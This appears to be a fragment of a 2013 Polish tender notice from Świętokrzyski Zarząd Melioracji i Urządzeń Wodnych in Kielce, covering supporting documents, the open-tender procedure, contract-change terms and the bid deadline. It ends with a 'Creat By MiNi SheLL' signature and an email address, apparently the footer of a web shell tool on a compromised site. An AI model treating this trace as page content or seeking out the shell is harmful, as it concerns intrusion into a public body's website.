1.7.1.	pisemne zobowiązanie  podmiotów  do oddania Wykonawcy przez dany podmiot(y) do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Wymagana forma dokumentu - oryginał

1.7.2.	dokumenty, o których mowa w par. 1 ust. 6 pkt 2  Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013 nr 0 poz. 231) 

-	Jeżeli zobowiązanie, o którym mowa w pkt. 1.7.1 w swojej treści wyczerpuje wszelkie przesłanki, o których mowa w par. 1, ust. 6, pkt 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013 nr 0 poz. 231) Wykonawca nie jest zobowiązany do przedkładania dokumentów, o którym mowa 
w pkt. 1.7.2.

1.8.	Stosownie do art. 26 ust. 2d ustawy, listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, albo informację o tym, że Wykonawca nie należy do grupy kapitałowej - wg  wzoru określonego w załączniku nr 10 do SIWZ. Wymagana forma dokumentu - oryginał. 

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument ten składa każdy z Wykonawców osobno.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne postanowienia, które zostaną wprowadzone do treści umowy.

1.1.	Ewentualne roboty zamienne lub zmniejszające będą rozliczane wg zasad określonych 
w rozdz. XVI pkt. 7 specyfikacji .

1.2.	Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy na warunkach §12 wzoru umowy stanowiącej załącznik nr 8 do SIWZ

1.3.	Zamawiający wymaga zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we wzorze umowy, stanowiącym załącznik nr 8 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szmiuw.kielce.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, pok. 217 (sekretariat).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2013 godzina 10:00, miejsce: Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, pok. 209.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com